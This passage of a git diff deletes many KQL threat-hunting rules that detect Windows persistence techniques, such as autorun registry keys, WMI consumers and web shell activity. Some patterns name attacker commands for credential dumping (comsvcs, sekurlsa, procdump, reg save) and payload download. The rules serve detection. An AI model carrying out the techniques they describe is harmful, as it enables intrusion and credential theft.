b/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql deleted file mode 100644 index b8bb4681..00000000 --- a/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/12/06 -// Level: high -// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". -// Tags: attack.persistence, attack.lateral_movement, attack.t1133, attack.t1136.001, attack.t1021.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group ")) \ No newline at end of file diff --git a/Persistence/VBScript_Payload_Stored_in_Registry.kql b/Persistence/VBScript_Payload_Stored_in_Registry.kql deleted file mode 100644 index 9973f4c1..00000000 --- a/Persistence/VBScript_Payload_Stored_in_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/03/05 -// Level: high -// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData")))) \ No newline at end of file diff --git a/Persistence/VMToolsd_Suspicious_Child_Process.kql b/Persistence/VMToolsd_Suspicious_Child_Process.kql deleted file mode 100644 index fcf64329..00000000 --- a/Persistence/VMToolsd_Suspicious_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: bohops, Bhabesh Raj -// Date: 2021/10/08 -// Level: high -// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup -// Tags: attack.execution, attack.persistence, attack.t1059 -DeviceProcessEvents -| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe")))) \ No newline at end of file diff --git a/Persistence/VsCode_Powershell_Profile_Modification.kql b/Persistence/VsCode_Powershell_Profile_Modification.kql deleted file mode 100644 index 6d500082..00000000 --- a/Persistence/VsCode_Powershell_Profile_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/24 -// Level: medium -// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013 -DeviceFileEvents -| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1" \ No newline at end of file diff --git a/Persistence/WINEKEY_Registry_Modification.kql b/Persistence/WINEKEY_Registry_Modification.kql deleted file mode 100644 index 40b59710..00000000 --- a/Persistence/WINEKEY_Registry_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: omkar72 -// Date: 2020/10/30 -// Level: high -// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor -// Tags: attack.persistence, attack.t1547 -DeviceRegistryEvents -| where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr" \ No newline at end of file diff --git a/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql deleted file mode 100644 index 3f40bc3a..00000000 --- a/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/09/02 -// Level: medium -// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. -// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003 -DeviceImageLoadEvents -| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe" \ No newline at end of file diff --git a/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql b/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql deleted file mode 100644 index 653e625e..00000000 --- a/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/10/11 -// Level: critical -// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters -// Tags: attack.persistence, attack.t1546.003 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\")))) \ No newline at end of file diff --git a/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql b/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql deleted file mode 100644 index 90563eab..00000000 --- a/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2018/03/07 -// Level: high -// Description: Detects WMI command line event consumers -// Tags: attack.t1546.003, attack.persistence -DeviceImageLoadEvents -| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll" \ No newline at end of file diff --git a/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql b/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql deleted file mode 100644 index 36c7415d..00000000 --- a/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2018/03/07 -// Level: medium -// Description: Detects WMI script event consumers -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.003 -DeviceProcessEvents -| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" \ No newline at end of file diff --git a/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql b/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql deleted file mode 100644 index a3d5d209..00000000 --- a/Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2018/03/07 -// Level: high -// Description: Detects file writes of WMI script event consumer -// Tags: attack.t1546.003, attack.persistence -DeviceFileEvents -| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" \ No newline at end of file diff --git a/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql b/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql deleted file mode 100644 index 9eba69fe..00000000 --- a/Persistence/Webshell_Detection_With_Command_Line_Keywords.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community -// Date: 2017/01/01 -// Level: high -// Description: Detects certain command line parameters often used during reconnaissance activity via web shells -// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 -DeviceProcessEvents -| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "cd /d ") or ((FolderPath endswith "\\dsquery.exe" or FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\pathping.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\tracert.exe" or FolderPath endswith "\\ver.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ ("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", "sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe")) \ No newline at end of file diff --git a/Persistence/Webshell_Hacking_Activity_Patterns.kql b/Persistence/Webshell_Hacking_Activity_Patterns.kql deleted file mode 100644 index e8ef37ec..00000000 --- a/Persistence/Webshell_Hacking_Activity_Patterns.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/17 -// Level: high -// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system - -// Tags: attack.persistence, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 -DeviceProcessEvents -| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv")) \ No newline at end of file diff --git a/Persistence/Webshell_Tool_Reconnaissance_Activity.kql b/Persistence/Webshell_Tool_Reconnaissance_Activity.kql deleted file mode 100644 index 84af50a2..00000000 --- a/Persistence/Webshell_Tool_Reconnaissance_Activity.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Cian Heasley, Florian Roth (Nextron Systems) -// Date: 2020/07/22 -// Level: high -// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands - -// Tags: attack.persistence, attack.t1505.003 -DeviceProcessEvents -| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or ProcessCommandLine contains "wget --help") \ No newline at end of file diff --git a/Persistence/WinSock2_Autorun_Keys_Modification.kql b/Persistence/WinSock2_Autorun_Keys_Modification.kql deleted file mode 100644 index 62710efd..00000000 --- a/Persistence/WinSock2_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe"))) \ No newline at end of file diff --git a/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql deleted file mode 100644 index e0568272..00000000 --- a/Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: FPT.EagleEye, Thomas Patzke (improvements) -// Date: 2021/06/29 -// Level: informational -// Description: Detect DLL Load from Spooler Service backup folder -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527 -DeviceImageLoadEvents -| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe" \ No newline at end of file diff --git a/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql b/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql deleted file mode 100644 index ac3d2959..00000000 --- a/Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/22 -// Level: medium -// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. -// Tags: attack.persistence, attack.t1547.015 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json" \ No newline at end of file diff --git a/Persistence/Winget_Admin_Settings_Modification.kql b/Persistence/Winget_Admin_Settings_Modification.kql deleted file mode 100644 index 4043350a..00000000 --- a/Persistence/Winget_Admin_Settings_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: low -// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks -// Tags: attack.defense_evasion, attack.persistence -DeviceRegistryEvents -| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey startswith "\\REGISTRY\\A" \ No newline at end of file diff --git a/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql b/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql deleted file mode 100644 index 9143ea08..00000000 --- a/Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/09 -// Level: medium -// Description: Detects when the 'AllowMultipleTSSessions' value is enabled. -Which allows for multiple Remote Desktop connection sessions to be opened at once. -This is often used by attacker as a way to connect to an RDP session without disconnecting the other users - -// Tags: attack.persistence, attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions" \ No newline at end of file diff --git a/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql b/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql deleted file mode 100644 index bbc905d0..00000000 --- a/Persistence/Winlogon_Notify_Key_Logon_Persistence.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2021/12/30 -// Level: high -// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. -Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - -// Tags: attack.persistence, attack.t1547.004 -DeviceRegistryEvents -| where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon" \ No newline at end of file diff --git a/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql deleted file mode 100644 index 30f433a7..00000000 --- a/Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file diff --git a/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql deleted file mode 100644 index bb361746..00000000 --- a/Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey contains "\\Run" or RegistryKey contains "\\RunOnce" or RegistryKey contains "\\RunOnceEx" or RegistryKey contains "\\RunServices" or RegistryKey contains "\\RunServicesOnce" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((RegistryValueData endswith ".exe\" /burn.runonce" and RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\" and InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" and (RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}" or RegistryKey endswith "\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}")) or (RegistryValueData endswith "-A251-47B7-93E1-CDD82E34AF8B}" or RegistryValueData =~ "grpconv -o" or (RegistryValueData contains "C:\\Program Files" and RegistryValueData contains "\\Dropbox\\Client\\Dropbox.exe" and RegistryValueData contains " /systemstartup")) or (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe" and RegistryKey contains "\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe")) and RegistryKey contains "\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\")) or (RegistryValueData endswith "}\\VC_redist.x64.exe\" /burn.runonce" and InitiatingProcessFolderPath endswith "\\VC_redist.x64.exe")))) \ No newline at end of file diff --git a/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql deleted file mode 100644 index 54e850a7..00000000 --- a/Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) -// Date: 2019/10/25 -// Level: medium -// Description: Detects modification of autostart extensibility point (ASEP) in registry. -// Tags: attack.persistence, attack.t1547.001 -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" and (RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Drivers32") and (not((RegistryValueData in~ ("(Empty)", "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options")))) \ No newline at end of file diff --git a/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql b/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql deleted file mode 100644 index ec001999..00000000 --- a/Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sreeman -// Date: 2020/04/21 -// Level: medium -// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. -// Tags: attack.t1211, attack.t1059, attack.defense_evasion, attack.persistence -DeviceProcessEvents -| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs") \ No newline at end of file diff --git a/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql b/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql deleted file mode 100644 index 857eb759..00000000 --- a/Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/17 -// Level: high -// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as 